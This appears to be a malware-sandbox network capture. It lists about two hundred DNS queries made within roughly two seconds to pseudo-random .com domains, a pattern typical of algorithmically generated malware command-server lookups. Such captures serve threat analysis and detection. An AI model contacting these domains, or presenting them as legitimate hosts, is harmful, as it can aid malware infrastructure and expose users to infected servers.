                                                                                                                                                                                                            Nov 11, 2024 18:25:23.481471062 CET192.168.2.101.1.1.10x4663Standard query (0)qekyqyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.481782913 CET192.168.2.101.1.1.10x64f8Standard query (0)ganyzas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.482795000 CET192.168.2.101.1.1.10x3b04Standard query (0)vofybic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.483483076 CET192.168.2.101.1.1.10xf75fStandard query (0)gaqypew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.484658957 CET192.168.2.101.1.1.10xc485Standard query (0)pupydig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.485076904 CET192.168.2.101.1.1.10x8cdcStandard query (0)pupycuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.487464905 CET192.168.2.101.1.1.10x3dd7Standard query (0)volyjym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.488641977 CET192.168.2.101.1.1.10xb26eStandard query (0)pufybop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.489156961 CET192.168.2.101.1.1.10xd740Standard query (0)qebylov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.489355087 CET192.168.2.101.1.1.10x78b2Standard query (0)qeqytal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.493633986 CET192.168.2.101.1.1.10x26adStandard query (0)qebyrip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.493814945 CET192.168.2.101.1.1.10x3a72Standard query (0)lymytar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.494837046 CET192.168.2.101.1.1.10x3ee0Standard query (0)purypyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.504565954 CET192.168.2.101.1.1.10x27dbStandard query (0)gacykub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.504731894 CET192.168.2.101.1.1.10x5313Standard query (0)qegynap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.505002975 CET192.168.2.101.1.1.10xcaadStandard query (0)vocykif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.505237103 CET192.168.2.101.1.1.10x5260Standard query (0)lyrysyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.509929895 CET192.168.2.101.1.1.10x4bf8Standard query (0)gahynaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.510385990 CET192.168.2.101.1.1.10x24d9Standard query (0)puvyliv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.514429092 CET192.168.2.101.1.1.10xfa4cStandard query (0)qetysuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.514614105 CET192.168.2.101.1.1.10x26a0Standard query (0)pujymel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.514863968 CET192.168.2.101.1.1.10x87ccStandard query (0)vojymet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.515079021 CET192.168.2.101.1.1.10xc684Standard query (0)vowypek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.515221119 CET192.168.2.101.1.1.10x321Standard query (0)lygynox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.515391111 CET192.168.2.101.1.1.10xfe86Standard query (0)qekyheq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.515975952 CET192.168.2.101.1.1.10xd7afStandard query (0)lysyvud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.516130924 CET192.168.2.101.1.1.10x8e1dStandard query (0)qedyvuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.516288996 CET192.168.2.101.1.1.10xdc40Standard query (0)gadyvis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.516753912 CET192.168.2.101.1.1.10xa621Standard query (0)lyvylod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.516944885 CET192.168.2.101.1.1.10xfb44Standard query (0)gatyduh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.517062902 CET192.168.2.101.1.1.10xf09eStandard query (0)vojygok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.517693996 CET192.168.2.101.1.1.10xa348Standard query (0)lyxyjun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.517709970 CET192.168.2.101.1.1.10xcd84Standard query (0)lykymyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.517926931 CET192.168.2.101.1.1.10xe42fStandard query (0)ganyriz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.518038034 CET192.168.2.101.1.1.10xc729Standard query (0)vonyrot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.518160105 CET192.168.2.101.1.1.10xecbStandard query (0)pujygaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.518238068 CET192.168.2.101.1.1.10x50daStandard query (0)gatycyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.519254923 CET192.168.2.101.1.1.10x5ed8Standard query (0)pumytol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.531105995 CET192.168.2.101.1.1.10xeedcStandard query (0)puzyjyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.531347990 CET192.168.2.101.1.1.10xc1cbStandard query (0)vopycyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.532445908 CET192.168.2.101.1.1.10x907aStandard query (0)lyryxen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.532562017 CET192.168.2.101.1.1.10xdf37Standard query (0)vopydum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.532675982 CET192.168.2.101.1.1.10xebaeStandard query (0)lykygaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.532799006 CET192.168.2.101.1.1.10xc76Standard query (0)galyheh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.532850981 CET192.168.2.101.1.1.10x2de2Standard query (0)gadyduz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.533006907 CET192.168.2.101.1.1.10x59b3Standard query (0)vocyquc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.533174992 CET192.168.2.101.1.1.10xba4eStandard query (0)gahyfow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.533293962 CET192.168.2.101.1.1.10x685eStandard query (0)lyvywux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.533348083 CET192.168.2.101.1.1.10xd579Standard query (0)qetyxeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.533458948 CET192.168.2.101.1.1.10x4d9aStandard query (0)puvywup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.534693956 CET192.168.2.101.1.1.10x2a70Standard query (0)lygyfir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.535697937 CET192.168.2.101.1.1.10x9133Standard query (0)puryxag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.540571928 CET192.168.2.101.1.1.10xa0fdStandard query (0)qegyfil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.119779110 CET192.168.2.101.1.1.10xd73Standard query (0)qedysyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.122039080 CET192.168.2.101.1.1.10xd332Standard query (0)pumyliq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.124202967 CET192.168.2.101.1.1.10xc516Standard query (0)puvyjyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.154591084 CET192.168.2.101.1.1.10x2761Standard query (0)qetytav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.159193039 CET192.168.2.101.1.1.10xa4fdStandard query (0)lysysyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.250781059 CET192.168.2.101.1.1.10xd295Standard query (0)gatypas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.303813934 CET192.168.2.101.1.1.10x94a2Standard query (0)vojybim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.306467056 CET192.168.2.101.1.1.10x163dStandard query (0)vopypec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.308676958 CET192.168.2.101.1.1.10x4f4cStandard query (0)pupypep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.311779022 CET192.168.2.101.1.1.10x19d1Standard query (0)pufypeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.314517975 CET192.168.2.101.1.1.10x46aStandard query (0)lyvyjyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.376499891 CET192.168.2.101.1.1.10xa640Standard query (0)qebykul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.380016088 CET192.168.2.101.1.1.10x991aStandard query (0)pujybig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.458386898 CET192.168.2.101.1.1.10x56fdStandard query (0)qekynog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.458626986 CET192.168.2.101.1.1.10x3d46Standard query (0)galynab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.458842993 CET192.168.2.101.1.1.10xdc7fStandard query (0)gaqykus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.458975077 CET192.168.2.101.1.1.10xafeeStandard query (0)lykynon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.463718891 CET192.168.2.101.1.1.10x7bcdStandard query (0)ganykuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.465225935 CET192.168.2.101.1.1.10xbafaStandard query (0)volymaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.466487885 CET192.168.2.101.1.1.10x40b7Standard query (0)gahyvuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.470082045 CET192.168.2.101.1.1.10x593eStandard query (0)vonykuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.513220072 CET192.168.2.101.1.1.10xaceeStandard query (0)gahydyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.569473982 CET192.168.2.101.1.1.10xc4a1Standard query (0)qetylip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.569658995 CET192.168.2.101.1.1.10xe5b1Standard query (0)lyvymej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.571032047 CET192.168.2.101.1.1.10xc77eStandard query (0)lygysen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.571100950 CET192.168.2.101.1.1.10xe817Standard query (0)gaqyrib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.571444988 CET192.168.2.101.1.1.10xa2e2Standard query (0)lykyfud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.571738958 CET192.168.2.101.1.1.10xc950Standard query (0)qekyfiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.572907925 CET192.168.2.101.1.1.10x6c2fStandard query (0)vopyzot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.573168993 CET192.168.2.101.1.1.10xbbd7Standard query (0)ganyqyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.573529959 CET192.168.2.101.1.1.10x9f21Standard query (0)gacynow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.575980902 CET192.168.2.101.1.1.10x8912Standard query (0)qexynol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.577809095 CET192.168.2.101.1.1.10xb233Standard query (0)vowyrif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.578973055 CET192.168.2.101.1.1.10x1ddfStandard query (0)gatyzoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.580857992 CET192.168.2.101.1.1.10x3097Standard query (0)pumywug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.583190918 CET192.168.2.101.1.1.10x7264Standard query (0)vofycyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.583472967 CET192.168.2.101.1.1.10xbf47Standard query (0)galyfis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.603452921 CET192.168.2.101.1.1.10x948Standard query (0)vonyqym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.603766918 CET192.168.2.101.1.1.10x316aStandard query (0)gadycew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.604196072 CET192.168.2.101.1.1.10x94e7Standard query (0)gacyhez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.604386091 CET192.168.2.101.1.1.10x9e51Standard query (0)purytov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.604777098 CET192.168.2.101.1.1.10x1934Standard query (0)qegyvuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.605104923 CET192.168.2.101.1.1.10x7bb3Standard query (0)volygoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.606106997 CET192.168.2.101.1.1.10x7f15Standard query (0)lysyxar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.607322931 CET192.168.2.101.1.1.10x1ac4Standard query (0)puzygop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.607487917 CET192.168.2.101.1.1.10x42a8Standard query (0)pujyduv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.607716084 CET192.168.2.101.1.1.10x6decStandard query (0)vojyduf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.607851982 CET192.168.2.101.1.1.10x132aStandard query (0)qebyqeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.608167887 CET192.168.2.101.1.1.10x1eb5Standard query (0)lygyvuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.608714104 CET192.168.2.101.1.1.10x4652Standard query (0)lyrytod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.609106064 CET192.168.2.101.1.1.10x35bcStandard query (0)qexyhap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.620467901 CET192.168.2.101.1.1.10xb197Standard query (0)qedyxel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.620801926 CET192.168.2.101.1.1.10x643bStandard query (0)qeqyrug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.620899916 CET192.168.2.101.1.1.10xf500Standard query (0)puvymaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.639575958 CET192.168.2.101.1.1.10xbdf3Standard query (0)lymywun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.639797926 CET192.168.2.101.1.1.10x805aStandard query (0)pufycyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.639960051 CET192.168.2.101.1.1.10xa22fStandard query (0)lyxygax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.641233921 CET192.168.2.101.1.1.10xfa27Standard query (0)vocyjet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.642016888 CET192.168.2.101.1.1.10xb9d7Standard query (0)lyrylix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.642220974 CET192.168.2.101.1.1.10x2b0dStandard query (0)pupyxal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.642301083 CET192.168.2.101.1.1.10x10e7Standard query (0)vocymak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.642384052 CET192.168.2.101.1.1.10x4a84Standard query (0)purylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.642476082 CET192.168.2.101.1.1.10x2d2fStandard query (0)vowykuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.642560005 CET192.168.2.101.1.1.10xd513Standard query (0)qegysyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.526262999 CET192.168.2.101.1.1.10x48c2Standard query (0)qetykyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.527975082 CET192.168.2.101.1.1.10xf92dStandard query (0)gahypoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.532151937 CET192.168.2.101.1.1.10x9476Standard query (0)lyryjej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.536156893 CET192.168.2.101.1.1.10xaeaeStandard query (0)puryjeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.536418915 CET192.168.2.101.1.1.10xfe5aStandard query (0)qegytop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.542448997 CET192.168.2.101.1.1.10x55faStandard query (0)vocybuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.543437958 CET192.168.2.101.1.1.10x8f44Standard query (0)vopykum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.544259071 CET192.168.2.101.1.1.10x648Standard query (0)lykyser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.551824093 CET192.168.2.101.1.1.10xf4ecStandard query (0)vojypat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.562577963 CET192.168.2.101.1.1.10xf05bStandard query (0)qekysel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.578488111 CET192.168.2.101.1.1.10x4b3bStandard query (0)vofypam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.578659058 CET192.168.2.101.1.1.10x838dStandard query (0)puzybil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.578980923 CET192.168.2.101.1.1.10x4e26Standard query (0)purywyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.579046965 CET192.168.2.101.1.1.10x5ef8Standard query (0)gacyfih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.579577923 CET192.168.2.101.1.1.10x5b5bStandard query (0)qexyfuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.580018997 CET192.168.2.101.1.1.10x546Standard query (0)qegyxav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.583249092 CET192.168.2.101.1.1.10xde97Standard query (0)qedytoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.585338116 CET192.168.2.101.1.1.10xb01dStandard query (0)pumyjev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.586108923 CET192.168.2.101.1.1.10x302eStandard query (0)volybut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.586487055 CET192.168.2.101.1.1.10xbf7cStandard query (0)lymyjyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.591094017 CET192.168.2.101.1.1.10x8e10Standard query (0)gatykyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.591274977 CET192.168.2.101.1.1.10x6060Standard query (0)lymymax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.591434956 CET192.168.2.101.1.1.10x7018Standard query (0)pupylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.591599941 CET192.168.2.101.1.1.10x7b0Standard query (0)gahyces.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.592084885 CET192.168.2.101.1.1.10xac5fStandard query (0)gadypah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.592652082 CET192.168.2.101.1.1.10x6932Standard query (0)qeqykyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.600235939 CET192.168.2.101.1.1.10x4dacStandard query (0)lysylun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.600934982 CET192.168.2.101.1.1.10x4569Standard query (0)lysytoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.601166964 CET192.168.2.101.1.1.10xad4aStandard query (0)vonyjef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.601454020 CET192.168.2.101.1.1.10xd350Standard query (0)qekyvup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.603240013 CET192.168.2.101.1.1.10x5f99Standard query (0)lyxynir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.614226103 CET192.168.2.101.1.1.10x7f51Standard query (0)lyrywur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.614419937 CET192.168.2.101.1.1.10x11cbStandard query (0)ganyhab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.614495039 CET192.168.2.101.1.1.10xc170Standard query (0)pupytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.615375042 CET192.168.2.101.1.1.10xa2f4Standard query (0)galyvuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.616116047 CET192.168.2.101.1.1.10xa2eaStandard query (0)qebyhag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.616292953 CET192.168.2.101.1.1.10x3886Standard query (0)vopyrik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.616422892 CET192.168.2.101.1.1.10x628cStandard query (0)pujycyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.616592884 CET192.168.2.101.1.1.10x24bcStandard query (0)vojycec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.616755962 CET192.168.2.101.1.1.10x84aStandard query (0)gatyruw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.619293928 CET192.168.2.101.1.1.10x3228Standard query (0)lykyvyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.626724005 CET192.168.2.101.1.1.10x4292Standard query (0)qetyrul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.626741886 CET192.168.2.101.1.1.10xd73dStandard query (0)lyvygon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.626966953 CET192.168.2.101.1.1.10xf511Standard query (0)puvygog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.628114939 CET192.168.2.101.1.1.10xad0fStandard query (0)puzyduq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.628397942 CET192.168.2.101.1.1.10xe305Standard query (0)lygyxad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.628397942 CET192.168.2.101.1.1.10x505fStandard query (0)lyvynid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.628695965 CET192.168.2.101.1.1.10xdb93Standard query (0)pujypal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.628922939 CET192.168.2.101.1.1.10xbf4cStandard query (0)qeqyqep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.629034042 CET192.168.2.101.1.1.10x74e2Standard query (0)vowyqyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.629106998 CET192.168.2.101.1.1.10xbf3eStandard query (0)gadyzib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.629239082 CET192.168.2.101.1.1.10x1878Standard query (0)vocygim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.629379988 CET192.168.2.101.1.1.10x12ceStandard query (0)qedylig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.629555941 CET192.168.2.101.1.1.10x495fStandard query (0)gaqyqez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.629589081 CET192.168.2.101.1.1.10x8453Standard query (0)galydyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.629792929 CET192.168.2.101.1.1.10x20f1Standard query (0)lyxyfuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.629926920 CET192.168.2.101.1.1.10x4a45Standard query (0)vofyzof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.630028009 CET192.168.2.101.1.1.10x1067Standard query (0)pumymap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.630110979 CET192.168.2.101.1.1.10xb097Standard query (0)puvybuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.632493973 CET192.168.2.101.1.1.10xa4e4Standard query (0)ganynos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.634071112 CET192.168.2.101.1.1.10xdea0Standard query (0)pufyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.634274006 CET192.168.2.101.1.1.10xe584Standard query (0)volydyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.647475004 CET192.168.2.101.1.1.10xc150Standard query (0)qebyniv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.647634983 CET192.168.2.101.1.1.10xabcbStandard query (0)vonymoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.802664042 CET192.168.2.101.1.1.10x9683Standard query (0)gaqyhaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.814270973 CET192.168.2.101.1.1.10xcae0Standard query (0)volycem.comA (IP address)IN (0x0001)false
